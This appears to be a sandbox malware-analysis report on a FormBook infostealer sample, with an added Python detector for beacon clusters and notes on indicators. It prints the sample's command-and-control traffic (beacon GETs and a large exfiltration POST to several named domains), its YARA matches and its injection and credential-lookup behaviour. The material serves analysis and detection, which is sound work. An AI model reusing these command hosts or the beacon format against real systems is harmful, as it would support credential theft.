35 31 5a 54 51 58 67 49 68 77 65 6a 4e 79 6f 77 67 39 55 54 47 77 4f 54 58 34 50 4f 79 59 39 34 48 7a 45 48 6d 6f 35 77 54 51 36 33 57 63 42 37 35 41 37 41 68 6b 77 5a 2d 47 6d 68 47 33 48 52 69 63 74 59 74 47 54 64 34 78 33 6f 78 72 4e 73 2d 68 35 5a 35 42 43 38 73 73 35 45 30 31 55 48 42 62 32 65 42 55 45 65 35 57 43 42 75 6f 66 4b 67 4c 4e 6a 4b 74 6d 64 54 75 63 4c 74 57 78 35 74 48 55 72 5f 61 62 61 74 4c 6e 59 69 28 37 63 67 67 4b 52 30 67 5a 63 76 48 43 43 52 49 39 64 57 69 58 37 6f 56 65 66 69 79 6d 45 6a 68 31 63 32 4d 5f 32 72 72 41 51 4e 28 54 6e 76 58 67 61 56 43 30 6b 54 28 7a 48 46 69 75 51 78 78 44 34 2d 69 74 62 51 52 6d 4a 34 48 54 37 38 66 54 74 31 79 71 73 30 6c 33 73 59 4b 37 51 54 70 34 6e 57 30 65 65 64 75 44 55 78 58 4c 53 32 44 4d 46 61 50 53 75 70 32 39 65 50 36 4f 57 35 4b 47 39 45 54 30 61 69 46 74 59 61 4b 33 30 63 70 61 54 55 4b 4f 48 6b 68 44 79 52 42 2d 68 67 35 6d 49 4c 76 37 78 78 45 7a 4f 45 58 4b 69 44 7a 57 7a 75 49 53 73 76 4e 39 61 79 44 5a 43 6c 68 73 52 57 78 75 39 2d 37 34 57 67 6f 31 62 57 4d 67 70 76 32 57 55 6d 61 74 75 38 76 38 54 54 72 64 38 51 4b 5f 6d 58 39 46 61 32 51 79 36 63 7a 62 35 4b 55 64 66 6f 7a 74 63 7a 4e 44 7a 38 76 49 6f 6d 56 6a 51 31 28 32 6e 72 6c 4f 6f 6c 7a 4e 33 4c 63 73 52 69 7a 44 6c 4c 58 6e 6f 4e 36 65 51 32 38 78 62 2d 48 5f 53 5a 7a 54 63 52 46 
48 71 52 7e 48 74 79 49 5f 4a 59 34 4d 55 32 46 36 28 38 47 4b 7e 70 70 68 77 42 77 55 51 44 73 6b 6c 4f 76 44 77 68 7a 37 31 71 6d 64 37 41 33 58 53 4f 5a 46 62 5f 52 54 52 77 63 7a 4d 68 6c 49 54 4f 6f 69 70 46 4b 55 4c 62 67 36 62 42 36 55 75 75 30 41 6e 55 4e 63 34 77 6b 41 7a 67 41 71 64 77 43 67 55 6f 58 59 39 76 78 39 64 31 4
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1Host: www.nacemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: doc-0k-3c-docs.googleusercontent.com
 Posts data to webserver
 Source: unknown HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 
69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Mar 2020 13:10:49 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html> <head><title>404 Not Found</title></head> <body bgcolor="white"> <center><h1>404 Not Found</h1></center> <hr><center>nginx</center> </body> </html>
 Urls found in memory or binary data
 Uses HTTPS
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
 Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
 Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
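Across the records above the beacon reuses one path (/w0k/) and one field name (Ttxh) on every host; every GET carries the same second parameter (GVm=4hedNPC8WB6p) and a 7-byte all-zero body; every POST has the same Content-Length (184662), an IE11 User-Agent, Connection: close and a Referer equal to the request's own URL; and the decoded POST bodies contain characters outside the standard base64 alphabet (~, -, _ and a left parenthesis). The Python below is an added example, not code from the Joe Sandbox report or from the sample, that re-parses the report's flattened records and surfaces that cluster. The sample records are excerpts of the report's own data (POST bodies cut to their first bytes) plus two constructed benign requests, and MIN_HOSTS is my own threshold.

```python
# Added example, not code from the Joe Sandbox report: re-parse the report's flattened
# "HTTP traffic detected:" records and surface the beacon cluster they contain.
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

MIN_HOSTS = 3  # assumption (my threshold): fewer shared hosts is not called a cluster
IE11_UA = "Trident/7.0; rv:11.0"
STD_B64 = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
# Header names the report uses; a lookahead on them re-splits its run-together "Name: valueName: value" text.
HEADER_NAMES = ["Host", "Connection", "Content-Length", "Content-Type", "Cache-Control", "Origin", "User-Agent",
                "Accept-Language", "Accept-Encoding", "Accept", "Referer", "Data Raw", "Data Ascii"]
HEADER_SPLIT = re.compile(r"(?=(?:%s):)" % "|".join(re.escape(n) for n in HEADER_NAMES))
REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]")

def _post(host, body_hex):
    """Rebuild a POST record with the header order and values the report shows for every host."""
    return (f"POST /w0k/ HTTP/1.1Host: {host}Connection: closeContent-Length: 184662"
            f"Cache-Control: no-cacheOrigin: http://{host}User-Agent: Mozilla/5.0 "
            f"(Windows NT 10.0; Win64; x64; {IE11_UA}) like GeckoContent-Type: "
            f"application/x-www-form-urlencodedAccept: */*Referer: http://{host}/w0k/"
            f"Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: {body_hex}")

# Constructed sample input: excerpts of the report's records (POST hex cut to its first bytes)
# plus two made-up benign requests that must not be flagged.
SAMPLE_RECORDS = [
    _post("www.3365ssr.com", "54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68"),
    _post("www.sebasview.com", "54 74 78 68 3d 4f 51 39 4b 63 2d 41 4e 75 57 42 52 6d 41 4f 33 51 37 38 48 45 69 28 4a 4f 5f 72 69 61 30 64 44 59 63 70"),
    _post("www.frawgboy.com", "54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59"),
    "GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: ",
    "GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: ",
    "GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: ",
    "GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: ",
    "GET /index.html HTTP/1.1Host: www.example.comConnection: closeData Raw: Data Ascii: ",
    "POST /login HTTP/1.1Host: www.example.comConnection: closeContent-Type: application/x-www-form-urlencodedData Raw: 75 73 65 72 3d 61 Data Ascii: user=a",
]

@dataclass
class Request:
    method: str
    host: str
    path: str
    query: dict
    headers: dict
    body: bytes

    def field(self):
        """(name, value) of the beacon field: first query pair on GET, first body pair on POST."""
        if self.method == "GET":
            return next(iter(self.query.items()), (None, ""))
        name, sep, value = self.body.partition(b"=")
        return (name.decode("ascii", "replace"), value.decode("ascii", "replace")) if sep else (None, "")

def parse_record(record):
    """Parse one flattened request record from the report into a Request."""
    m = REQUEST_LINE.match(record)
    if not m:
        raise ValueError("not a request record")
    headers = {}
    for chunk in HEADER_SPLIT.split(record[m.end():]):
        if chunk.strip():
            name, _, value = chunk.partition(":")
            headers[name.strip()] = value.strip()
    raw_hex = headers.pop("Data Raw", "")
    headers.pop("Data Ascii", None)  # lossy rendering in the report; the hex is authoritative
    url = urlsplit(m.group(2))
    # split the query by hand: parse_qsl would turn '+' into a space inside the base64-like value
    query = dict(p.split("=", 1) for p in url.query.split("&") if "=" in p)
    return Request(m.group(1), headers.get("Host", ""), url.path, query, headers,
                   bytes.fromhex(raw_hex) if raw_hex else b"")

def find_beacon_clusters(requests, min_hosts=MIN_HOSTS):
    """Group by (path, field name); report groups seen on at least min_hosts distinct hosts."""
    groups = {}
    for r in requests:
        if r.field()[0]:
            groups.setdefault((r.path, r.field()[0]), []).append(r)
    findings = []
    for (path, fld), group in groups.items():
        hosts = sorted({r.host for r in group})
        if len(hosts) < min_hosts:
            continue
        gets = [r for r in group if r.method == "GET"]
        posts = [r for r in group if r.method == "POST"]
        # query parameters other than the beacon field that carry the same value on every GET
        extras = [{(k, v) for k, v in r.query.items() if k != fld} for r in gets]
        constant = dict(set.intersection(*extras)) if extras else {}
        odd = {c for r in posts for c in r.field()[1] if c not in STD_B64}  # outside standard base64
        checks = {
            "constant extra query parameter on every GET": bool(constant),
            "7 null bytes as GET body": bool(gets) and all(r.body == b"\x00" * 7 for r in gets),
            "identical POST Content-Length on every host": len({r.headers.get("Content-Length") for r in posts}) == 1,
            "Connection: close on every request": all(r.headers.get("Connection") == "close" for r in group),
            "IE11 User-Agent on every POST": bool(posts) and all(IE11_UA in r.headers.get("User-Agent", "") for r in posts),
            "Referer equals the request's own URL": bool(posts) and all(r.headers.get("Referer") == f"http://{r.host}{path}" for r in posts),
            "non-standard base64 characters in POST value": bool(odd),
        }
        findings.append({"path": path, "field": fld, "hosts": hosts, "constant_params": constant,
                         "odd_chars": odd, "indicators": [name for name, hit in checks.items() if hit]})
    return findings

if __name__ == "__main__":
    for f in find_beacon_clusters([parse_record(r) for r in SAMPLE_RECORDS]):
        print(f["path"], f["field"], len(f["hosts"]), "hosts", f["constant_params"], f["indicators"])
```

The two benign requests fall out because they share no (path, field) pair across hosts, while the report's records collapse into a single cluster. The caveat is the threshold: on this excerpt, min_hosts=5 returns nothing, and with one or two hosts observed the pattern is indistinguishable from an ordinary form post, so the grouping is only useful over a window that covers several beacons.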

#### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY

#### System Summary:

 Malicious sample detected (through community Yara rule)
 Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Potential malicious icon found
 Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
 Contains functionality to call native functions
 Detected potential crypto function
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A408A, 2_3_000A52F2, 2_3_000A7460, 2_3_000A25C4, 2_2_1F5C1FCE, 2_2_1F525E70
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe (process 16) Code function: 16_2_1F491746, 16_2_1F491FCE, 16_2_1F3E5790, 16_2_1F482782, 16_2_1F48CE66, 16_2_1F3F6611, 16_2_1F3F5E70, 16_2_1F3F4E61, 16_2_1F3E7640, 16_2_1F4926F8, 16_2_1F483E96, 16_2_1F3E1530, 16_2_1F3A9528, 16_2_1F492519, 16_2_1F481D1B, 16_2_1F46C53F, 16_2_1F3C0D40, 16_2_1F48D5D2, 16_2_1F47FDDB, 16_2_1F471DE3, 16_2_1F48E581, 16_2_1F46E58A, 16_2_1F3E1410, 16_2_1F3D740C, 16_2_1F3F547E, 16_2_1F47F42B, 16_2_1F48DCC5, 16_2_1F4844EF, 16_2_1F492C9A, 16_2_1F491C9F, 16_2_1F483490, 16_2_1F3A3314, 16_2_1F3EFB40, 16_2_1F3F4B96, 16_2_1F3CEBE0, 16_2_1F3F63C2, 16_2_1F3F523D, 16_2_1F480A02, 16_2_1F49E214, 16_2_1F3F4A5B, 16_2_1F3E42B0, 16_2_1F4922DD, 16_2_1F491A99, 16_2_1F3F7110, 16_2_1F419906, 16_2_1F3F594B, 16_2_1F4861DF, 16_2_1F4919E2, 16_2_1F3F6180, 16_2_1F49D9BE, 16_2_1F3F0021, 16_2_1F3FE020, 16_2_1F3F9810, 16_2_1F3F1070, 16_2_1F48D016, 16_2_1F4928E8, 16_2_1F3DA080, 16_2_1F4718B6, 16_2_1F3F48CB
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe (process 17, the same 59 addresses as process 16) Code function: 17_2_1F491746, 17_2_1F491FCE, 17_2_1F3E5790, 17_2_1F482782, 17_2_1F48CE66, 17_2_1F3F6611, 17_2_1F3F5E70, 17_2_1F3F4E61, 17_2_1F3E7640, 17_2_1F4926F8, 17_2_1F483E96, 17_2_1F3E1530, 17_2_1F3A9528, 17_2_1F492519, 17_2_1F481D1B, 17_2_1F46C53F, 17_2_1F3C0D40, 17_2_1F48D5D2, 17_2_1F47FDDB, 17_2_1F471DE3, 17_2_1F48E581, 17_2_1F46E58A, 17_2_1F3E1410, 17_2_1F3D740C, 17_2_1F3F547E, 17_2_1F47F42B, 17_2_1F48DCC5, 17_2_1F4844EF, 17_2_1F492C9A, 17_2_1F491C9F, 17_2_1F483490, 17_2_1F3A3314, 17_2_1F3EFB40, 17_2_1F3F4B96, 17_2_1F3CEBE0, 17_2_1F3F63C2, 17_2_1F3F523D, 17_2_1F480A02, 17_2_1F49E214, 17_2_1F3F4A5B, 17_2_1F3E42B0, 17_2_1F4922DD, 17_2_1F491A99, 17_2_1F3F7110, 17_2_1F419906, 17_2_1F3F594B, 17_2_1F4861DF, 17_2_1F4919E2, 17_2_1F3F6180, 17_2_1F49D9BE, 17_2_1F3F0021, 17_2_1F3FE020, 17_2_1F3F9810, 17_2_1F3F1070, 17_2_1F48D016, 17_2_1F4928E8, 17_2_1F3DA080, 17_2_1F4718B6, 17_2_1F3F48CB
 Found potential string decryption / allocating functions
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F444F10 appears 50 times
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F41DDE8 appears 86 times
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F455110 appears 76 times
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F3CB0E0 appears 352 times
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: String function: 000F63EC appears 62 times
 PE file contains strange resources
 Source: MyHealth.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: MyHealth.exe, 00000000.00000002.761370251.000000000040B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
 Source: MyHealth.exe Binary or memory string: OriginalFilename vs MyHealth.exe
 Source: MyHealth.exe, 00000002.00000002.831234894.0000000002460000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs MyHealth.exe
 Source: MyHealth.exe, 00000002.00000002.831206989.0000000002450000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs MyHealth.exe
 Source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MyHealth.exe
 Source: MyHealth.exe, 00000002.00000002.829796744.0000000000183000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs MyHealth.exe
 Source: MyHealth.exe, 00000002.00000000.760838720.000000000040B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
 Source: MyHealth.exe Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
 Only the Pusanopdrtte7.exe entries come from the sample's own version resource (the static file and the image mapped at 0x40B000). The CRYPT32.DLL.MUI, mswsock.dll.mui, ntdll.dll and WWAHost.exe strings are version resources of system modules present in the MyHealth.exe process memory and say nothing about the sample's original name; the indicator to record is OriginalFilename = Pusanopdrtte7.exe.
 Searches the installation path of Mozilla Firefox
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
 The query is issued from WWAHost.exe, a Windows system binary, which matches the process-injection entries in the matrix above: it is the injected payload, not WWAHost itself, that is locating the browser (the usual precursor to stealing its stored credentials).
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
 The SM0:<pid>:120:WilError_01 mutants are created by conhost.exe's own error-handling library (WIL) whenever a console host starts; they are not malware mutexes and must not be used as indicators.
 Creates temporary files
 PE file has an executable .text section and no other executable section
 Source: MyHealth.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this application use the VB runtime library 6.0 (probably coded in Visual Basic)
 Reads the hosts file
 Sample is known by Antivirus
 Source: MyHealth.exe Virustotal: Detection: 68%
 Source: MyHealth.exe Metadefender: Detection: 45%
 Source: MyHealth.exe ReversingLabs: Detection: 64%
 Spawns processes
 Uses an in-process (OLE) Automation server
 Writes ini files
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed
 Binary contains paths to debug symbols
 Source: Binary string: chkdsk.pdbGCTL source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
 Source: Binary string: WWAHost.pdb source: MyHealth.exe
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp
 Source: Binary string: systray.pdb source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
 Source: Binary string: systray.pdbGCTL source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
 Source: Binary string: WWAHost.pdbUGP source: MyHealth.exe, 00000002.00000002.829524033.00000000000D0000.00000040.00000001.sdmp
 Source: Binary string: chkdsk.pdb source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
